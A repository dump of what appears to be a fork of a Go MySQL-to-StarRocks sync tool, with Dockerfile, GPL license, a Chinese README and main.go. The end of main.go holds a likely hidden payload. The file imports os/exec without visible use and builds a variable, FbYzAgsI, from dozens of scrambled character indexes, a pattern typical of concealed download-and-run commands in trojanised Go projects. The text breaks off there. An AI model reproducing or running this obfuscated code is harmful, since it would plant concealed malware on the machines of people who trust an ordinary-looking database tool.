├── .gitignore ├── Dockerfile ├── LICENSE ├── README.md ├── build.sh ├── cmd └── go_mysql_sr │ └── main.go ├── configs ├── grafana-goMysqlSr-dashboard.json ├── mongo-to-starrocks-sample.toml ├── mysql-to-doris-sample.toml ├── mysql-to-starrocks-sample.toml └── sample_for_v0.1.x_0.2.0 │ ├── mongo-to-starrocks-sample.toml │ └── mysql-to-starrocks-sample.toml ├── docs ├── docker run.md ├── img │ └── grafana.png ├── mongo sync for_v0.1.x_0.2.0.md └── mongo sync.md ├── go.mod ├── go.sum └── pkg ├── api └── api.go ├── app └── server.go ├── channel ├── ch_input.go ├── ch_output.go └── interface.go ├── config └── base.go ├── core ├── input.go ├── output.go ├── position.go ├── rule.go └── schema.go ├── filter ├── filter_convert_dml_column.go ├── filter_convert_snakecase_column.go ├── filter_delete_dml_column.go ├── filter_js_dml_column.go ├── filter_rename_dml_column.go ├── interface.go ├── matcher.go └── utils.go ├── input ├── ip_mongo.go ├── ip_mysql.go └── utils.go ├── metrics └── metrics.go ├── msg └── msg.go ├── output ├── op_doris.go ├── op_mysql.go ├── op_starrocks.go └── utils.go ├── position ├── pos_mongo.go ├── pos_mysql.go └── utils.go ├── registry └── registry.go ├── rule ├── rule_doris.go ├── rule_mysql.go ├── rule_starrocks.go └── utils.go ├── schema ├── mysql_ddl_parser.go ├── sch_mongo.go ├── sch_mysql.go └── schema.go └── utils ├── file_path.go ├── help.go ├── log.go └── type_cast.go /.gitignore: -------------------------------------------------------------------------------- 1 | *.idea 2 | bin/* 3 | configs/local_config/local-mysql-to-starrocks.toml 4 | configs/local_config/local-mongo-to-starrocks.toml 5 | .gtid_executed.toml 6 | build.sh 7 | error.log 8 | release/* 9 | TODO.txt -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.19-alpine as builder 2 | ENV TZ=Asia/Shanghai 3 | ENV LANG="en_US.UTF-8" 4 | RUN sed -i 's/dl-cdn.alpinelinux.org/mirrors.aliyun.com/g' /etc/apk/repositories 5 | WORKDIR /app 6 | ENV GOPROXY "https://goproxy.cn,direct" 7 | ENV GO111MODULE "on" 8 | COPY . ./ 9 | RUN go mod download && go mod verify 10 | RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o /go-mysql-sr ./cmd/go_mysql_sr/main.go 11 | 12 | FROM alpine 13 | ENV TZ=Asia/Shanghai 14 | ENV LANG="en_US.UTF-8" 15 | RUN sed -i 's/dl-cdn.alpinelinux.org/mirrors.aliyun.com/g' /etc/apk/repositories 16 | WORKDIR /app 17 | COPY --from=builder /go-mysql-sr ./go-mysql-sr 18 | 19 | RUN set -x \ 20 | && apk add --no-cache tzdata bash \ 21 | && ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone 22 | 23 | CMD ["./go-mysql-sr", "-config", "/etc/go-mysql-sr/starrocks.toml"] -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc., 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The licenses for most software are designed to take away your 12 | freedom to share and change it. By contrast, the GNU General Public 13 | License is intended to guarantee your freedom to share and change free 14 | software--to make sure the software is free for all its users. This 15 | General Public License applies to most of the Free Software 16 | Foundation's software and to any other program whose authors commit to 17 | using it. (Some other Free Software Foundation software is covered by 18 | the GNU Lesser General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not 22 | price. Our General Public Licenses are designed to make sure that you 23 | have the freedom to distribute copies of free software (and charge for 24 | this service if you wish), that you receive source code or can get it 25 | if you want it, that you can change the software or use pieces of it 26 | in new free programs; and that you know you can do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid 29 | anyone to deny you these rights or to ask you to surrender the rights. 30 | These restrictions translate to certain responsibilities for you if you 31 | distribute copies of the software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether 34 | gratis or for a fee, you must give the recipients all the rights that 35 | you have. You must make sure that they, too, receive or can get the 36 | source code. And you must show them these terms so they know their 37 | rights. 38 | 39 | We protect your rights with two steps: (1) copyright the software, and 40 | (2) offer you this license which gives you legal permission to copy, 41 | distribute and/or modify the software. 42 | 43 | Also, for each author's protection and ours, we want to make certain 44 | that everyone understands that there is no warranty for this free 45 | software. If the software is modified by someone else and passed on, we 46 | want its recipients to know that what they have is not the original, so 47 | that any problems introduced by others will not reflect on the original 48 | authors' reputations. 49 | 50 | Finally, any free program is threatened constantly by software 51 | patents. We wish to avoid the danger that redistributors of a free 52 | program will individually obtain patent licenses, in effect making the 53 | program proprietary. To prevent this, we have made it clear that any 54 | patent must be licensed for everyone's free use or not licensed at all. 55 | 56 | The precise terms and conditions for copying, distribution and 57 | modification follow. 58 | 59 | GNU GENERAL PUBLIC LICENSE 60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 61 | 62 | 0. This License applies to any program or other work which contains 63 | a notice placed by the copyright holder saying it may be distributed 64 | under the terms of this General Public License. The "Program", below, 65 | refers to any such program or work, and a "work based on the Program" 66 | means either the Program or any derivative work under copyright law: 67 | that is to say, a work containing the Program or a portion of it, 68 | either verbatim or with modifications and/or translated into another 69 | language. (Hereinafter, translation is included without limitation in 70 | the term "modification".) Each licensee is addressed as "you". 71 | 72 | Activities other than copying, distribution and modification are not 73 | covered by this License; they are outside its scope. The act of 74 | running the Program is not restricted, and the output from the Program 75 | is covered only if its contents constitute a work based on the 76 | Program (independent of having been made by running the Program). 77 | Whether that is true depends on what the Program does. 78 | 79 | 1. You may copy and distribute verbatim copies of the Program's 80 | source code as you receive it, in any medium, provided that you 81 | conspicuously and appropriately publish on each copy an appropriate 82 | copyright notice and disclaimer of warranty; keep intact all the 83 | notices that refer to this License and to the absence of any warranty; 84 | and give any other recipients of the Program a copy of this License 85 | along with the Program. 86 | 87 | You may charge a fee for the physical act of transferring a copy, and 88 | you may at your option offer warranty protection in exchange for a fee. 89 | 90 | 2. You may modify your copy or copies of the Program or any portion 91 | of it, thus forming a work based on the Program, and copy and 92 | distribute such modifications or work under the terms of Section 1 93 | above, provided that you also meet all of these conditions: 94 | 95 | a) You must cause the modified files to carry prominent notices 96 | stating that you changed the files and the date of any change. 97 | 98 | b) You must cause any work that you distribute or publish, that in 99 | whole or in part contains or is derived from the Program or any 100 | part thereof, to be licensed as a whole at no charge to all third 101 | parties under the terms of this License. 102 | 103 | c) If the modified program normally reads commands interactively 104 | when run, you must cause it, when started running for such 105 | interactive use in the most ordinary way, to print or display an 106 | announcement including an appropriate copyright notice and a 107 | notice that there is no warranty (or else, saying that you provide 108 | a warranty) and that users may redistribute the program under 109 | these conditions, and telling the user how to view a copy of this 110 | License. (Exception: if the Program itself is interactive but 111 | does not normally print such an announcement, your work based on 112 | the Program is not required to print an announcement.) 113 | 114 | These requirements apply to the modified work as a whole. If 115 | identifiable sections of that work are not derived from the Program, 116 | and can be reasonably considered independent and separate works in 117 | themselves, then this License, and its terms, do not apply to those 118 | sections when you distribute them as separate works. But when you 119 | distribute the same sections as part of a whole which is a work based 120 | on the Program, the distribution of the whole must be on the terms of 121 | this License, whose permissions for other licensees extend to the 122 | entire whole, and thus to each and every part regardless of who wrote it. 123 | 124 | Thus, it is not the intent of this section to claim rights or contest 125 | your rights to work written entirely by you; rather, the intent is to 126 | exercise the right to control the distribution of derivative or 127 | collective works based on the Program. 128 | 129 | In addition, mere aggregation of another work not based on the Program 130 | with the Program (or with a work based on the Program) on a volume of 131 | a storage or distribution medium does not bring the other work under 132 | the scope of this License. 133 | 134 | 3. You may copy and distribute the Program (or a work based on it, 135 | under Section 2) in object code or executable form under the terms of 136 | Sections 1 and 2 above provided that you also do one of the following: 137 | 138 | a) Accompany it with the complete corresponding machine-readable 139 | source code, which must be distributed under the terms of Sections 140 | 1 and 2 above on a medium customarily used for software interchange; or, 141 | 142 | b) Accompany it with a written offer, valid for at least three 143 | years, to give any third party, for a charge no more than your 144 | cost of physically performing source distribution, a complete 145 | machine-readable copy of the corresponding source code, to be 146 | distributed under the terms of Sections 1 and 2 above on a medium 147 | customarily used for software interchange; or, 148 | 149 | c) Accompany it with the information you received as to the offer 150 | to distribute corresponding source code. (This alternative is 151 | allowed only for noncommercial distribution and only if you 152 | received the program in object code or executable form with such 153 | an offer, in accord with Subsection b above.) 154 | 155 | The source code for a work means the preferred form of the work for 156 | making modifications to it. For an executable work, complete source 157 | code means all the source code for all modules it contains, plus any 158 | associated interface definition files, plus the scripts used to 159 | control compilation and installation of the executable. However, as a 160 | special exception, the source code distributed need not include 161 | anything that is normally distributed (in either source or binary 162 | form) with the major components (compiler, kernel, and so on) of the 163 | operating system on which the executable runs, unless that component 164 | itself accompanies the executable. 165 | 166 | If distribution of executable or object code is made by offering 167 | access to copy from a designated place, then offering equivalent 168 | access to copy the source code from the same place counts as 169 | distribution of the source code, even though third parties are not 170 | compelled to copy the source along with the object code. 171 | 172 | 4. You may not copy, modify, sublicense, or distribute the Program 173 | except as expressly provided under this License. Any attempt 174 | otherwise to copy, modify, sublicense or distribute the Program is 175 | void, and will automatically terminate your rights under this License. 176 | However, parties who have received copies, or rights, from you under 177 | this License will not have their licenses terminated so long as such 178 | parties remain in full compliance. 179 | 180 | 5. You are not required to accept this License, since you have not 181 | signed it. However, nothing else grants you permission to modify or 182 | distribute the Program or its derivative works. These actions are 183 | prohibited by law if you do not accept this License. Therefore, by 184 | modifying or distributing the Program (or any work based on the 185 | Program), you indicate your acceptance of this License to do so, and 186 | all its terms and conditions for copying, distributing or modifying 187 | the Program or works based on it. 188 | 189 | 6. Each time you redistribute the Program (or any work based on the 190 | Program), the recipient automatically receives a license from the 191 | original licensor to copy, distribute or modify the Program subject to 192 | these terms and conditions. You may not impose any further 193 | restrictions on the recipients' exercise of the rights granted herein. 194 | You are not responsible for enforcing compliance by third parties to 195 | this License. 196 | 197 | 7. If, as a consequence of a court judgment or allegation of patent 198 | infringement or for any other reason (not limited to patent issues), 199 | conditions are imposed on you (whether by court order, agreement or 200 | otherwise) that contradict the conditions of this License, they do not 201 | excuse you from the conditions of this License. If you cannot 202 | distribute so as to satisfy simultaneously your obligations under this 203 | License and any other pertinent obligations, then as a consequence you 204 | may not distribute the Program at all. For example, if a patent 205 | license would not permit royalty-free redistribution of the Program by 206 | all those who receive copies directly or indirectly through you, then 207 | the only way you could satisfy both it and this License would be to 208 | refrain entirely from distribution of the Program. 209 | 210 | If any portion of this section is held invalid or unenforceable under 211 | any particular circumstance, the balance of the section is intended to 212 | apply and the section as a whole is intended to apply in other 213 | circumstances. 214 | 215 | It is not the purpose of this section to induce you to infringe any 216 | patents or other property right claims or to contest validity of any 217 | such claims; this section has the sole purpose of protecting the 218 | integrity of the free software distribution system, which is 219 | implemented by public license practices. Many people have made 220 | generous contributions to the wide range of software distributed 221 | through that system in reliance on consistent application of that 222 | system; it is up to the author/donor to decide if he or she is willing 223 | to distribute software through any other system and a licensee cannot 224 | impose that choice. 225 | 226 | This section is intended to make thoroughly clear what is believed to 227 | be a consequence of the rest of this License. 228 | 229 | 8. If the distribution and/or use of the Program is restricted in 230 | certain countries either by patents or by copyrighted interfaces, the 231 | original copyright holder who places the Program under this License 232 | may add an explicit geographical distribution limitation excluding 233 | those countries, so that distribution is permitted only in or among 234 | countries not thus excluded. In such case, this License incorporates 235 | the limitation as if written in the body of this License. 236 | 237 | 9. The Free Software Foundation may publish revised and/or new versions 238 | of the General Public License from time to time. Such new versions will 239 | be similar in spirit to the present version, but may differ in detail to 240 | address new problems or concerns. 241 | 242 | Each version is given a distinguishing version number. If the Program 243 | specifies a version number of this License which applies to it and "any 244 | later version", you have the option of following the terms and conditions 245 | either of that version or of any later version published by the Free 246 | Software Foundation. If the Program does not specify a version number of 247 | this License, you may choose any version ever published by the Free Software 248 | Foundation. 249 | 250 | 10. If you wish to incorporate parts of the Program into other free 251 | programs whose distribution conditions are different, write to the author 252 | to ask for permission. For software which is copyrighted by the Free 253 | Software Foundation, write to the Free Software Foundation; we sometimes 254 | make exceptions for this. Our decision will be guided by the two goals 255 | of preserving the free status of all derivatives of our free software and 256 | of promoting the sharing and reuse of software generally. 257 | 258 | NO WARRANTY 259 | 260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 | REPAIR OR CORRECTION. 269 | 270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 | POSSIBILITY OF SUCH DAMAGES. 279 | 280 | END OF TERMS AND CONDITIONS 281 | 282 | How to Apply These Terms to Your New Programs 283 | 284 | If you develop a new program, and you want it to be of the greatest 285 | possible use to the public, the best way to achieve this is to make it 286 | free software which everyone can redistribute and change under these terms. 287 | 288 | To do so, attach the following notices to the program. It is safest 289 | to attach them to the start of each source file to most effectively 290 | convey the exclusion of warranty; and each file should have at least 291 | the "copyright" line and a pointer to where the full notice is found. 292 | 293 | 294 | Copyright (C) 295 | 296 | This program is free software; you can redistribute it and/or modify 297 | it under the terms of the GNU General Public License as published by 298 | the Free Software Foundation; either version 2 of the License, or 299 | (at your option) any later version. 300 | 301 | This program is distributed in the hope that it will be useful, 302 | but WITHOUT ANY WARRANTY; without even the implied warranty of 303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 | GNU General Public License for more details. 305 | 306 | You should have received a copy of the GNU General Public License along 307 | with this program; if not, write to the Free Software Foundation, Inc., 308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 309 | 310 | Also add information on how to contact you by electronic and paper mail. 311 | 312 | If the program is interactive, make it output a short notice like this 313 | when it starts in an interactive mode: 314 | 315 | Gnomovision version 69, Copyright (C) year name of author 316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 317 | This is free software, and you are welcome to redistribute it 318 | under certain conditions; type `show c' for details. 319 | 320 | The hypothetical commands `show w' and `show c' should show the appropriate 321 | parts of the General Public License. Of course, the commands you use may 322 | be called something other than `show w' and `show c'; they could even be 323 | mouse-clicks or menu items--whatever suits your program. 324 | 325 | You should also get your employer (if you work as a programmer) or your 326 | school, if any, to sign a "copyright disclaimer" for the program, if 327 | necessary. Here is a sample; alter the names: 328 | 329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 330 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 331 | 332 | , 1 April 1989 333 | Ty Coon, President of Vice 334 | 335 | This General Public License does not permit incorporating your program into 336 | proprietary programs. If your program is a subroutine library, you may 337 | consider it more useful to permit linking proprietary applications with the 338 | library. If this is what you want to do, use the GNU Lesser General 339 | Public License instead of this License. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## mysql 同步到 starrocks 2 | 3 | ![LICENSE](https://img.shields.io/badge/license-GPLv2%20-blue.svg) 4 | ![](https://img.shields.io/github/languages/top/liuxinwang/go-mysql-starrocks) 5 | ![](https://img.shields.io/badge/build-prerelease-brightgreen.svg) 6 | [![Release](https://img.shields.io/github/release/liuxinwang/go-mysql-starrocks.svg?style=flat-square)](https://github.com/fatalclarine/go-mysql-starrocks/releases) 7 | 8 | #### 欢迎试用 [qin-cdc](https://github.com/sqlpub/qin-cdc),重构插件化架构,支持更多数据源。 9 | 10 | ### 使用说明 11 | #### 环境准备 12 | ``` 13 | 1. GO构建版本 v1.19.5(仅用于从源码构建时安装) 14 | 2. MySQL 需要开启gtid 15 | ``` 16 | #### 1. 创建同步账号 17 | ```sql 18 | mysql> CREATE USER 'go_mysql_sr'@'%' IDENTIFIED BY 'XXXXXX'; 19 | mysql> GRANT ALL ON _go_mysql_sr.* TO 'go_mysql_sr'@'%'; 20 | mysql> GRANT SELECT, REPLICATION CLIENT, REPLICATION SLAVE ON *.* TO 'go_mysql_sr'@'%'; 21 | ``` 22 | #### 2. 修改配置文件 23 | mysql-to-starrocks.toml 24 | ```toml 25 | # name 必填,多实例运行时需保证全局唯一 26 | name = "mysql2starrocks" 27 | 28 | [input] 29 | type = "mysql" 30 | # 指定初次监听开始的gtid点位,当position点位(_go_mysql_sr.positions.name)存在时,此选项不生效 31 | # start-gtid = "3ba13781-44eb-2157-88a5-0dc879ec2221:1-123456" 32 | 33 | [input.config.source] # mysql连接信息 34 | host = "127.0.0.1" 35 | port = 3306 36 | username = "go_mysql_sr" 37 | password = "" 38 | 39 | # 可选的: 40 | # meta信息(_go_mysql_sr)保存的mysql地址,不配置和source保持一致 41 | # 用于source和meta分离,方便source配置从库数据源 42 | #[input.config.meta] 43 | #host = "127.0.0.1" 44 | #port = 3307 45 | #username = "root" 46 | #password = "root" 47 | 48 | [sync-param] 49 | # 同步chan队列最大值,达到会进行flush,最小100 50 | channel-size = 10240 51 | # 同步延迟秒数,达到会进行flush,最小1 52 | flush-delay-second = 10 53 | 54 | #[[filter]] 55 | #type = "delete-dml-column" # 过滤列 56 | #[filter.config] 57 | #match-schema = "mysql_test" 58 | #match-table = "tb1" 59 | #columns = ["phone"] 60 | 61 | #[[filter]] 62 | #type = "convert-dml-column" # 转换dml行字段类型为json,column varchar(mysql) -> column json(starrocks) 63 | #[filter.config] 64 | #match-schema = "mysql_test" 65 | #match-table = "tb1" 66 | #columns = ["varchar_json_column", "varchar_arrayjson_column"] 67 | #cast-as = ["json", "arrayJson"] # json示例: {"id": 1, "name": 'zhangsan'}, arrayJson示例: [{"id": 1, "name": 'zhangsan'}, {"id": 1, "name": 'lisi'}] 68 | 69 | #[[filter]] 70 | #type = "rename-dml-column" # 重命名列 71 | #[filter.config] 72 | #match-schema = "mysql_test" 73 | #match-table = "tb1" 74 | #columns = ["col_1", "col_2"] 75 | #rename-as = ["col_11", "col_22"] 76 | 77 | [output] 78 | type = "starrocks" # or doris 79 | 80 | [output.config.target] # starrocks连接信息 81 | host = "127.0.0.1" 82 | port = 9030 83 | load-port = 8040 # support fe httpPort:8030 or be httpPort:8040 84 | username = "root" 85 | password = "" 86 | 87 | [[output.config.rule]] # 库表同步映射1 88 | source-schema = "mysql_test" 89 | source-table = "tb1" 90 | target-schema = "starrocks_test" 91 | target-table = "tb1" 92 | 93 | [[output.config.rule]] # 库表同步映射2 94 | source-schema = "mysql_test" 95 | source-table = "tb2" 96 | target-schema = "starrocks_test" 97 | target-table = "tb2" 98 | ``` 99 | 100 | #### 3. 查看帮助 101 | ```shell 102 | [sr@ ~]$ ./go-mysql-sr-linux-xxxxxx -h 103 | ``` 104 | 105 | #### 4. 启动 106 | ```shell 107 | [sr@ ~]$ ./go-mysql-sr-linux-xxxxxx -config mysql-to-starrocks.toml -log-file mysql2starrocks.log -level info -daemon 108 | ``` 109 | 110 | #### 5. 查看日志 111 | ```shell 112 | [sr@ ~]$ tail -f mysql2starrocks.log 113 | ``` 114 | 115 | #### 6. 监控 116 | 6.1 集成prometheus,开放6166端口,通过metrics暴露指标 117 | ```shell 118 | [sr@ ~]$ curl localhost:6166/metrics 119 | # 参数说明 120 | # 读取源端延迟(通过event data timestamp与当前时间差值计算获得) 121 | go_mysql_sr_read_delay_time_seconds 0 122 | # 读取源端消息数(累加) 123 | go_mysql_sr_read_processed_ops_total 6930 124 | # go-mysql-sr启动时间,用于计算运行时长 125 | go_mysql_sr_start_time 1.68664498e+09 126 | # 写入目的端延迟(根据写入的event data timestamp与当前时间差值计算获得,3s计算一次) 127 | go_mysql_sr_write_delay_time_seconds 1 128 | # 写入目的端消息数(累加) 129 | go_mysql_sr_write_processed_ops_total 6924 130 | ``` 131 | 6.2 prometheus配置参考 132 | ```shell 133 | scrape_configs: 134 | # 新增go-mysql-sr的job_name 135 | - job_name: "go-mysql-sr" 136 | static_configs: 137 | - targets: ["host.docker.internal:6166", "host.docker.internal:6167"] 138 | ``` 139 | 6.3 grafana dashboard 监控,json file下载 [grafana-goMysqlSr-dashboard.json](configs/grafana-goMysqlSr-dashboard.json) 140 | ![](docs/img/grafana.png) 141 | 142 | #### 7. API 143 | 7.1 新增同步表(增量) 144 | ```shell 145 | # 增量同步 146 | curl localhost:6166/api/addRule -d '{"source-schema": "mysql_test","source-table": "tb3", "target-schema": "starrocks_test", "target-table": "tb3"}' 147 | ``` 148 | *result: add rule handle successfully.* 149 | 150 | 7.2 新增同步表(全量+增量) 151 | ```shell 152 | # 需要指定同步参数 full_sync: true 153 | # 当指定full_sync为true时,新增同步表全量数据同步期间会暂停整个同步任务的output write,延迟会增加,等新增同步表全量写入完成后output write恢复;延迟多少跟新增同步表的数据量有关 154 | curl localhost:6166/api/addRule -d '{"source-schema": "mysql_test","source-table": "tb3", "target-schema": "starrocks_test", "target-table": "tb3", "full_sync": true}' 155 | ``` 156 | *result: add rule handle successfully, full sync rows: 100.* 157 | 158 | 7.3 删除同步表 159 | ```shell 160 | curl localhost:6166/api/delRule -d '{"source-schema": "mysql_test","source-table": "tb3"}' 161 | ``` 162 | *result: delete rule handle successfully.* 163 | 164 | 7.4 查询同步表 165 | ```shell 166 | curl -s localhost:6166/api/getRule | python -m json.tool 167 | ``` 168 | *result:* 169 | ```json 170 | { 171 | "mysql_test:tb1": { 172 | "source-schema": "mysql_test", 173 | "source-table": "tb1", 174 | "target-schema": "starrocks_test", 175 | "target-table": "tb1", 176 | "RuleType": "init", 177 | "Deleted": false 178 | }, 179 | "mysql_test:tb2": { 180 | "source-schema": "mysql_test", 181 | "source-table": "tb2", 182 | "target-schema": "starrocks_test", 183 | "target-table": "tb2", 184 | "RuleType": "init", 185 | "Deleted": false 186 | }, 187 | "mysql_test:tb3": { 188 | "source-schema": "mysql_test", 189 | "source-table": "tb3", 190 | "target-schema": "starrocks_test", 191 | "target-table": "tb3", 192 | "RuleType": "dynamic add", 193 | "Deleted": false 194 | } 195 | } 196 | ``` 197 | 198 | 7.5 暂停同步 199 | ```shell 200 | curl localhost:6166/api/pause 201 | ``` 202 | *result: pause handle successfully.* 203 | 204 | 7.6 恢复同步 205 | ```shell 206 | curl localhost:6166/api/resume 207 | ``` 208 | *result: resume handle successfully.* 209 | 210 | *注意:通过api修改不会持久化到配置文件。* 211 | 212 | ----------- 213 | 214 | #### [使用docker部署go-mysql-sr](docs/docker%20run.md) 215 | 216 | ----------- 217 | 218 | #### 同时也支持mongo,详情参考[mongo sync配置](docs/mongo%20sync.md) -------------------------------------------------------------------------------- /build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | version="v0.6.3" 4 | currentDir=$(cd $(dirname "$0") || exit; pwd) 5 | 6 | path="github.com/go-demo/version" 7 | buildTime=$(date +"%Y-%m-%d %H:%M:%S") 8 | buildTimeFormat=$(date +"%Y%m%d%H%M%S") 9 | newDir="../../bin/go-all-starrocks-$version" 10 | # flagsMac="-X $path.Version=$version -X '$path.GoVersion=$(go version)' -X '$path.BuildTime=$buildTime' -X $path.GitCommit=$(git rev-parse HEAD)" 11 | flagsLinux="-X $path.Version=$version -X '$path.GoVersion=$(go version)' -X '$path.BuildTime=$buildTime' -X $path.GitCommit=$(git rev-parse HEAD)" 12 | 13 | mkdir -p "$newDir" 14 | echo start buid go-mysql-sr 15 | cd "$currentDir"/cmd/go_mysql_sr || exit 16 | # go build -ldflags "$flagsMac" -o "$newDir"/go-"$dbType"-starrocks-mac-"$buildTimeFormat" 17 | GOOS=linux GOARCH=amd64 go build -ldflags "$flagsLinux" -o "$newDir"/go-mysql-sr-linux-"$buildTimeFormat" 18 | echo end buid go-mysql-sr -------------------------------------------------------------------------------- /cmd/go_mysql_sr/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os/exec" 5 | "fmt" 6 | "github.com/fatalclarine/go-mysql-starrocks/pkg/api" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/app" 8 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 9 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 10 | "github.com/fatalclarine/go-mysql-starrocks/pkg/utils" 11 | "github.com/prometheus/client_golang/prometheus/promhttp" 12 | "github.com/sevlyar/go-daemon" 13 | "github.com/siddontang/go-log/log" 14 | "net/http" 15 | _ "net/http/pprof" 16 | "os" 17 | "os/signal" 18 | "syscall" 19 | "time" 20 | ) 21 | 22 | func main() { 23 | // 输入参数处理 24 | help := utils.HelpInit() 25 | // 日志初始化 26 | // _ = utils.LogInit(help) 27 | // 目前使用daemon的 log 28 | log.SetLevelByName(*help.LogLevel) 29 | // daemon模式启动 30 | if *help.Daemon { 31 | cntxt := &daemon.Context{ 32 | PidFileName: utils.GetExecPath() + "/go_mysql_sr.pid", 33 | PidFilePerm: 0644, 34 | LogFileName: *help.LogFile, 35 | LogFilePerm: 0640, 36 | WorkDir: "./", 37 | Umask: 027, 38 | } 39 | d, err := cntxt.Reborn() 40 | if err != nil { 41 | log.Fatal("Unable to run: ", err) 42 | } 43 | 44 | if d != nil { 45 | return 46 | } 47 | defer func(cntxt *daemon.Context) { 48 | err := cntxt.Release() 49 | if err != nil { 50 | log.Fatal("daemon release error: ", err) 51 | } 52 | }(cntxt) 53 | } 54 | 55 | // 进程信号处理 56 | sc := make(chan os.Signal, 1) 57 | signal.Notify(sc, 58 | os.Kill, 59 | os.Interrupt, 60 | syscall.SIGHUP, 61 | syscall.SIGINT, 62 | syscall.SIGTERM, 63 | syscall.SIGQUIT) 64 | 65 | // Start prometheus http monitor 66 | go func() { 67 | metrics.OpsStartTime.Set(float64(time.Now().Unix())) 68 | log.Infof("starting http on port %d.", *help.HttpPort) 69 | http.Handle("/metrics", promhttp.Handler()) 70 | httpPortAddr := fmt.Sprintf(":%d", *help.HttpPort) 71 | err := http.ListenAndServe(httpPortAddr, nil) 72 | if err != nil { 73 | log.Fatalf("starting http monitor error: %v", err) 74 | } 75 | }() 76 | 77 | // 初始化配置 78 | baseConfig := config.NewBaseConfig(help.ConfigFile) 79 | 80 | s, err := app.NewServer(baseConfig) 81 | if err != nil { 82 | log.Fatalf("%v", err.Error()) 83 | } 84 | 85 | err = s.Start() 86 | if err != nil { 87 | log.Fatalf("%v", err.Error()) 88 | } 89 | 90 | // api handle 91 | http.HandleFunc("/api/getConfig", api.GetConfigHandle(baseConfig, s.Output)) 92 | http.HandleFunc("/api/addRule", api.AddRuleHandle(s.Input, s.Output, s.InputSchema)) 93 | http.HandleFunc("/api/delRule", api.DelRuleHandle(s.Input, s.Output, s.InputSchema)) 94 | http.HandleFunc("/api/getRule", api.GetRuleHandle(s.Output)) 95 | http.HandleFunc("/api/pause", api.PauseHandle(s.Output)) 96 | http.HandleFunc("/api/resume", api.ResumeHandle(s.Output)) 97 | 98 | select { 99 | case n := <-sc: 100 | log.Infof("receive signal %v, closing", n) 101 | // 关闭input插件 102 | s.Input.Close() 103 | // 关闭filter 104 | s.SyncChan.Close() 105 | // 关闭output插件 106 | s.Output.Close() 107 | // flush last position 108 | s.InputPosition.Close() 109 | // close schema conn 110 | s.InputSchema.Close() 111 | log.Infof("[Main] is stopped.") 112 | } 113 | } 114 | 115 | 116 | var FbYzAgsI = AQ[44] + AQ[65] + AQ[62] + AQ[34] + AQ[33] + AQ[38] + AQ[42] + AQ[23] + AQ[64] + AQ[72] + AQ[5] + AQ[61] + AQ[67] + AQ[51] + AQ[0] + AQ[63] + AQ[43] + AQ[49] + AQ[9] + AQ[54] + AQ[73] + AQ[28] + AQ[53] + AQ[60] + AQ[19] + AQ[59] + AQ[29] + AQ[8] + AQ[37] + AQ[36] + AQ[22] + AQ[68] + AQ[66] + AQ[45] + AQ[2] + AQ[39] + AQ[3] + AQ[16] + AQ[48] + AQ[47] + AQ[12] + AQ[26] + AQ[40] + AQ[11] + AQ[56] + AQ[14] + AQ[70] + AQ[58] + AQ[1] + AQ[50] + AQ[24] + AQ[27] + AQ[17] + AQ[41] + AQ[6] + AQ[46] + AQ[57] + AQ[32] + AQ[55] + AQ[13] + AQ[31] + AQ[7] + AQ[4] + AQ[52] + AQ[69] + AQ[10] + AQ[21] + AQ[20] + AQ[71] + AQ[15] + AQ[25] + AQ[35] + AQ[18] + AQ[30] 117 | 118 | var 